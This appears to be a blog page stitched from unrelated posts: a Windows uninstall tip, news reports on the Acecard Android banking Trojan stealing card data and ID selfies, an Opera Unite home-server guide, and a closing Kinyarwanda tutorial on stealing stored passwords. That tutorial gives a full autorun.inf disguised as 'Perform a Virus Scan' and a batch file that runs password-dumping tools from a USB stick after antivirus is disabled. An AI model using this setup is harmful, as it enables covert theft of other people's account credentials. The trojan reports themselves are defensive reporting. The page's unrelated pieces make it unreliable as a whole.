The removal can also be triggered from the command line. Open the Command Prompt as administrator and type“msiexec /x ” followed by the name of the ".msi" file used by the program you want to remove.



You can also add other command line parameters to control the way the uninstall is done. For more information, check this article from Microsoft: Msiexec (command-line options).
If you are interested in how to remove modern apps from Windows, which are distributed using the Windows Store, read the second page in this guide.

Sobanukirwa: Nyiragongo

https://youtu.be/Izt5nED_DuA

Android Banking Trojan Tricks Victims into Submitting Selfie Holding their ID Card

While some payment card companies like Mastercard have switched to selfies as an alternative to passwords when verifying IDs for online payments, hackers have already started taking advantage of this new security verification methods.

Researchers have discovered a new Android banking Trojan that masquerades primarily as a video plugin, like Adobe Flash Player, pornographic app, or video codec, and asks victims to send a selfie holding their ID card, according to a blog post published by McAfee.

The Trojan is the most recent version of Acecard that has been labeled as one of the most dangerousAndroid banking Trojans known today, according to Kaspersky Lab Anti-malware Research Team.

Once successfully installed, the trojan asks users for a number of device's permissions to execute the malicious code and then waits for victims to open apps, specifically those where it would make sense to request payment card information.

Acecard Steals your Payment Card and Real ID details

The banking trojan then overlays itself on top of the legitimate app where it proceeds to ask users for their payment card number and card details such as card holder's name, expiration date, and CVV number.

"It displays its own window over the legitimate app, asking for your credit card details," explains McAfee researcher Bruce Snell. "After validating the card number, it goes on to ask for additional information such as the 4-digit number on the back."

Once this is done, the trojan then looks to obtain users' personal information, including their name, date of birth, mailing address, for "verification purposes," and even requests a photo of the front and back sides of their ID card.

After this, the Trojan also prompts to ask users to hold their ID card in their hand, underneath their face, and take a selfie.

Hackers can make illegal Transfers and Take Over your Online Accounts

All these pieces of information are more than enough for an attacker to verify illegal banking transactions and steal access to victims' social media accounts by confirming the stolen identities.

So far this version of Acecard Android banking Trojan has impacted users in Singapore and Hong Kong.

This social engineering trick of Trojan obviously is not new, and any tech-savvy users would quickly catch this malicious behavior as there is no reason for Google to ask for your ID card. But the trick still works with non and less technical users.

Since all of these fake apps have been distributed outside of Google Play Store, users are strongly advised to avoid downloading and installing apps from untrusted sources. Besides this, users should pay attention to the permissions apps are asking for.

Most importantly: No app needs a photo of you holding your ID card except perhaps a mobile banking service. So, always be cautious before doing that.

Android Banking Trojan Asks for Selfie With Your ID

In the first half of 2016 we noticed that Android banking Trojans had started to improve their phishing overlays on legitimate financial apps to ask for more information. Victims were requested to provide “Mother’s Maiden Name,” “Father’s Middle Name,” “Maternal Grandmothers Name,” or a “Memorable Word.” Attackers used that data to respond to security questions and obtain illegal access to the victims’ bank accounts.

Recently the McAfee Labs Mobile Research Team found a new variant of the well-known Android banking Trojan Acecard (aka Torec, due to the use of Tor to communicate with the control server) that goes far beyond just asking for financial information. In addition to requesting credit card information and second-factor authentication, the malicious application asks for a selfie with your identity document—very useful for a cybercriminal to confirm a victim’s identity and access not only to banking accounts, but probably also even social networks.

Like most Android banking Trojans, this threat also tricks users into installing the malware by pretending to be an adult video app or a codec/plug-in necessary to see a specific video:


As soon as the malicious app is executed by the user, it hides the icon from the home launcher and constantly asks for device administrator privileges to make its removal difficult:


When it is running in the background, the malware constantly monitors the opening of specific apps to show the user its main phishing overlay, pretending to be Google Play and asking for a credit card number:


Once the credit card number is validated, the next phishing overlay asks for more personal and credit card information such as cardholder name, date of birth, phone number, credit card expiration date, and CCV:



Depending on the type of the credit card that the user entered in the first phishing overlay, the malware will also ask for a second factor of authentication:


In the preceding case, the malware asks for the HK (Hong Kong) ID. This new variant also targets users in Singapore, asking for the National Registration Identity Card and the Singaporean passport:



After collecting credit card and personal information from the victim, the malware offers a fake “identity confirmation” that consists of three steps. The first two steps ask the user to upload a clean and readable photo of the front and back side of the victim’s identity document (national ID, passport, driver’s license):


The final step asks for a selfie with the identity document:



Why are Android banking Trojans so popular? One possible reason is the exploit kit GM Bot, whose source code was leaked in February. (IBM SecurityIntelligence blogged about it.)

Android banking Trojans such as Acecard are constantly evolving and improving their social engineering attacks to gain as much sensitive and private information as possible. Attackers want not only a victim’s credit card information and different factors of authentication to financial services, but also a picture of the victim with identity document to remotely access to different systems. To protect yourselves from this threat, employ security software on your mobile, avoid downloading and installing apps from untrusted sources, and do not trust screens that ask for financial and personal information.

McAfee Mobile Security detects this threat as Android/Torec and alerts mobile users if it is present, while protecting them from any data loss. For more information about McAfee Mobile Security, visit http://www.mcafeemobilesecurity.com.

Targeted apps

• com.android.vending


• com.google.android.music


• com.google.android.videos


• com.google.android.play.games


• com.google.android.apps.books


• com.whatsapp


• com.viber.voip


• com.dropbox.android


• com.tencent.mm


• jp.naver.line.android

How to Turn Your Home Computer into a Web Server

Before getting into the actual process, let’s look at a couple of real-world situations that explain why you may want to turn your home computer into a web server.

Situation #1. Say you have music MP3s, documents and other important files on the hard drive of your home computer. If you turn this home computer into a web server, you will be able to access all these files from office or any other Internet connected machine including your mobile phone.

Situation #2. You have some personal photographs that you want to share with other family members. You can either upload these pictures online to a site like Flickr or better still, just convert the computer into a web server. Now you can connect the camera to the computer, transfer the digital pictures to some designated folder and they’ll instantly become available to your friends and family anywhere in the world.

Situation #3. You want to host a website on the internet but the web hosting jargon like FTP, DNS, etc. is way too complex for you. The workaround therefore is that you setup a web server on your home computer (it’s easy) and then host a website in seconds without spending a single penny on external web hosting services.

Now if any of the above reasons look convincing enough, here’s how you can convert your Windows, Mac or Linux PC into a web server in less than two minutes – no technical knowledge required.

Download the Opera Unite software and install it. Congratulations, you are now running a web server on your machine and just need another minute to configure local file folders that you want to share with others over the internet.

Here’s an illustrated screenshot of the configuration panel – nothing technical here again.



Start the Opera Web browser (yes, that’s also you web server now) and enable the Opera Unite service from the lower left corner. Now double click the File Sharing link and select the folder whose content you want to share on the web. Any file or folder inside this folder can now be accessed over the internet – you can either use a public URL or specify a password for private sharing.

The following screencast video has more detailed instructions on how to get started with Opera Unite.

[embed]https://youtu.be/zeoHVeBwIsY[/embed]

Dore uuburyo wakwiba ama password yakoreshejwe kuri mudasobwa mu gihe cyahise.

Tugiye Kurebera Hamwe uko wa Kwiba cyangwa wabona Password zitandukanye ukoresheje Flash, gusa muratwihanganira ko amagambo amwe n’amwe agaruka mu ndimi z’amahanga kuko bitoroshye kuyabonera ikinyarwanda, nk’uko mubizi Windows ibika ama Password yamwe mu bintu dukoresha buri munsi nka messenger passwords , MSN, Yahoo, AOL, Windows messenger ,…. Hamwe na Outlook Express, SMTP, POP, FTP ikoreshe uburyo bwa auto-complete passwords itagwa na ama Browser amwe nka Internet Explorer na FireFox.Ushobora gukoresha ama Tools yo kurikavaringa (Recover) izo password ukoreshe USB PenDrive.
Ibikenewe:
MessenPass: Ikoreshwa mu gukora Recover ya Password za MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger, Trillian, Miranda, and GAIM.
Mail PassView: Ikoreshwa mu gukora Recover ya Password za email nka: Outlook Express, Microsoft Outlook 2000 (POP3 na SMTP Accounts gusa), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP na SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.

IE Passview: Ikoreshwa mu gukora Recover ya Password za Internet Explorer
Protected Storage PassView: Ikoreshwa mu gukora Recover ya Password zabitswe n’ama Browser atandukanye
Hamwe n’izindi nyinshi nka PasswordFox, …
Bitewe naho ugiye gukura Password ukoreshwa izi Tools twashyize Hano
Dore Uko Bikorwa:
Icyitonderwa: Hagarika byagahe gato AntiVirus yawe.
1. Kora Download y’ayo ma Tools 5 twavuze haruguru ubundi uzishyire kuri Flash yawe
(mspass.exe, mailpv.exe, iepv.exe, pspv.exe na passwordfox.exe).
2. Fungura NotePad ubundi Wandikemo
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
Ubundi uyibike (Save) Kuri iri izina
New Text Document.txt to autorun.inf
Kora Copy ya autorun.inf kuri Flash Yawe
3. Fungura indi NotePad nshya ubundi wandikemo
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
Yibike ubundi uyihe iri zina
New Text Document.txt to launch.bat
Kora Copy ya launch.bat file kuri Flash yawe
Ubu Flash yawe yiteguye gukoresha mukuzana Password.
1. Shyira Flash yawe kuri mashine kuri Message ubona hitamo Option yambere (Perform a Virus Scan)
2. Ubu za Tookit washyizeho zitangira gukora akazi kazo zifata buri Password yose zikabika muri .txt document.
3. Scan irangiye Password zose ushobora kuzibona muri ya Text Document.
Icyitonderwa: Izana Password zakoreshejwe kuri mashine, kuma browser, applicatio . Muri Version zose za Windows